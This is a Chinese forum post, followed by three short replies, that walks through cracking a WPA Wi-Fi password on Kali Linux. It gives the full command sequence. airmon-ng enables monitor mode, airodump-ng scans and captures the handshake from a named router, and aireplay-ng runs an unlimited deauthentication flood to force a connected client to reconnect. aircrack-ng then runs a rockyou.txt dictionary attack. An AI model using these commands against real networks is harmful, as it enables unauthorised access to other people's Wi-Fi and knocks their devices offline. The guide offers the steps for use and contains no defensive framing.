基于kail linux的wifi破解--airmon-ng 无线安全

SuperZed 2017-9-24 10377

0x00 什么是wifi
  Wi-Fi是一种允许电子设备连接到一个无线局域网(WLAN)的技术,通常使用2.4G UHF或5G SHF ISM 
  射频频段。连接到无线局域网通常是有密码保护的;但也可是开放的,这样就允许任何在WLAN范围内
  的设备可以连接上。Wi-Fi是一个无线网络通信技术的品牌,由Wi-Fi联盟所持有。目的是改善基于I
  EEE 802.11标准的无线网路产品之间的互通性。有人把使用IEEE 802.11系列协议的局域网就称为无
  线保真。甚至把Wi-Fi等同于无线网际网路(Wi-Fi是WLAN的重要组成部分)。
  关于"Wi-Fi”这个缩写词的发音,根据英文标准韦伯斯特词典的读音注释,标准发音为/ˈwaɪ.faɪ/  因为Wi-Fi这个单词是两个单词组成的,所以书写形式最好为WI-FI,这样也就不存在所谓专家所说
  的读音问题,同理有HI-FI(/haɪ.faɪ/)。
  2014年8月,网络安全研究人员鲁本·圣马尔塔表示,如果飞机WiFi开放度过高,可能会被黑客用于劫机。
  0x01 环境准备
    kail linux
    无线网卡(如果你把kail linux装在虚拟机中,你需要usb无线网卡)
    密码字典(一个好的字典决定成败)这里我使用的是kail linux中默认的字典
    字典所在位置:/usr/share/wordlists
   0x02 前戏
     第一步:首先查看自己网卡的状态使用命令:ifconfig

                 

1.png

                     prism0是开启监控模式之后才有的

               

BASIC
        第二步:开启对无线网卡的监控模式:airmon-ng start wlan0

               2.png

                   

BASIC
        第三步:扫描附近的wifi热点:airodump-ng  prism0

3.png

                BSSID 路由器 mac

                CH  信道

BASIC
       第四步:抓取握手包:airodump-ng -c 1 --bssid 34:96:72:A5:62:1F -w msf prism0
         -c表示信道,在第三步中的ch,--bssid 路由器mac -w 抓取的握手包存放位置

4.png

              

BASIC
        第五步:发起洪水攻击:aireplay-ng -0 0 -a 34:96:72:A5:62:1F -c C8:14:51:48:26:DF 
         prism0 --ignore-negative-one
         -0     0表示不限制
         -a      路由器mac地址
         -c      链接路由器的mac地址 
         目的:让连接wifi的手机断网重连,这样的话我们就可以获取连接信息(握手包)

6.png

BASIC
      0x03 利用抓到的握手包进行破解
       进行破解:aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/msf-01.cap
    Opening /root/msf-01.cap

5.png

Bash
            破解成功密码
       0x04 总结
            其中两个地方比较耗时间,一个是抓握手包,一个就是破解了
            原文地址:


最新回复 (3)
全部楼主
  • wangzishow 2017-9-24
    2
    wpa需要字典来破解当然速度慢,要是字典没有密码也破不了。wep的时代过去了……
  • 卸载中... 2017-10-10
    3
    当年的奶瓶!
  • 流浪情人 2017-11-21
    4
    没有字典  就没有办法    跑起来太慢了
返回
发新帖